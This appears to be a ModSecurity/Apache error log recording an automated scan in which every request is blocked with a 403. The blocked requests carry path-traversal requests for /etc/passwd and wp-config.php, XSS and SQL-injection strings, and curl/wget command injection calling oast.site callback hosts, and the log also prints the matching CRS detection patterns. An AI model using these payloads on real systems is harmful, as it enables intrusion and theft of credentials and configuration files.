[Tue Aug 29 11:41:26.359623 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAYf-SsAAAAD"]
[Tue Aug 29 11:41:26.499882 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo md5('CVE-2012-1823'); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAc0NgcAAAAM"]
[Tue Aug 29 11:41:26.562822 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:month: '>\\x22<svg/onload=confirm('month')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO129sCo-f0AAAQkBdEAAAAC"]
[Tue Aug 29 11:41:26.679191 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:ajax_path: ../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO129sCo-f0AAAcbSGkAAAAv"]
[Tue Aug 29 11:41:27.656054 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ajax_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO1298Co-f0AAAQSWpEAAAA0"]
[Tue Aug 29 11:41:28.397489 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gazseqbsnk1961.oast.site found within TX:1: cjmnbitjmimt14dgn26gazseqbsnk1961.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/Umbraco/feedproxy.aspx"] [unique_id "ZO12@MCo-f0AAAcbSG0AAAAv"]
[Tue Aug 29 11:41:30.438386 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at REQUEST_COOKIES:Cacti. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within REQUEST_COOKIES:Cacti: ;curl http://cjmnbitjmimt14dgn26g357uurmb1dezt.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/graph_realtime.php"] [unique_id "ZO12@sCo-f0AAAcrikkAAAAB"]
[Tue Aug 29 11:41:30.540307 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |id found within ARGS:name: |id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/delsnap.pl"] [unique_id "ZO12@sCo-f0AAAc0NhgAAAAM"]
[Tue Aug 29 11:41:32.625639 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:READ.filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:READ.filePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/operator/fileread"] [unique_id "ZO12-MCo-f0AAAbo-aMAAAAi"]
[Tue Aug 29 11:41:33.423131 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:src: /scripts/simple.php/../../../../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php"] [unique_id "ZO12-cCo-f0AAAUKhIgAAABC"]
[Tue Aug 29 11:41:34.364209 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO12-sCo-f0AAAc0NiwAAAAM"]
[Tue Aug 29 11:41:35.557173 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param1: dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/AurallRECMonitor/services/svc-login.php"] [unique_id "ZO12-8Co-f0AAAQSWrAAAAA0"]
[Tue Aug 29 11:41:36.422746 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:za_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:za_file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZO13AMCo-f0AAAXHqDMAAAAT"]
[Tue Aug 29 11:41:36.556285 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:UID: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/exportFile"] [unique_id "ZO13AMCo-f0AAAQkBg4AAAAC"]
[Tue Aug 29 11:41:39.357067 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:order: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/finder/index.php"] [unique_id "ZO13A8Co-f0AAAcoNbEAAAAF"]
[Tue Aug 29 11:41:39.504062 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:sql. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: systables found within ARGS:sql: select st.tablename from sys.systables st"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/nacos/v1/cs/ops/derby"] [unique_id "ZO13A8Co-f0AAAc8A3AAAAAK"]
[Tue Aug 29 11:41:40.419783 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:fn: ../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13BMCo-f0AAAQSWsIAAAA0"]
[Tue Aug 29 11:41:42.888945 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:adminDirHand. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:adminDirHand: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/include/dialog/config.php"] [unique_id "ZO13BsCo-f0AAAc8A4oAAAAK"]
[Tue Aug 29 11:41:45.667625 2023] [:error] [pid 1857] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:value: $(wget http:/cjmnbitjmimt14dgn26gnojb7knrmyzt1.oast.site))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO13CcCo-f0AAAdBfDcAAAAR"]
[Tue Aug 29 11:41:46.480788 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:alg_wc_pif_download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:alg_wc_pif_download_file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO13CsCo-f0AAAcqJUMAAAAG"]
[Tue Aug 29 11:41:49.427408 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/kvmlm2/index.dhtml"] [unique_id "ZO13DcCo-f0AAAUKhQEAAABC"]
[Tue Aug 29 11:41:56.423856 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13FMCo-f0AAAdQ3cUAAAAV"]
[Tue Aug 29 11:41:57.353150 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:score. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:score: 2134\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO13FcCo-f0AAAdECYcAAAAW"]
[Tue Aug 29 11:41:59.800727 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:rsvp_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:rsvp_id: (select(0)from(select(sleep(5)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"] [unique_id "ZO13F8Co-f0AAAdUcxsAAAAZ"]
[Tue Aug 29 11:42:00.424252 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gt7u6xae91aqhr.oast.site/hqbq.txt found within TX:1: cjmnbitjmimt14dgn26gt7u6xae91aqhr.oast.site/hqbq.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ZO13GMCo-f0AAAQSWxMAAAA0"]
[Tue Aug 29 11:42:01.407138 2023] [:error] [pid 1864] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:controller: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13GcCo-f0AAAdIZCwAAAAG"]
[Tue Aug 29 11:42:04.404585 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:cat /etc/passwd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/command.cgi"] [unique_id "ZO13HMCo-f0AAAdaZMoAAAAM"]
[Tue Aug 29 11:42:05.429437 2023] [:error] [pid 1884] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:download. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:download: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13HcCo-f0AAAdcs78AAAAC"]
[Tue Aug 29 11:42:06.471361 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/socialfit/popup.php"] [unique_id "ZO13HsCo-f0AAAdQ3eIAAAAV"]
[Tue Aug 29 11:42:07.509290 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13H8Co-f0AAAQSWyAAAAA0"]
[Tue Aug 29 11:42:08.359569 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO13IMCo-f0AAAcsLFMAAAAE"]
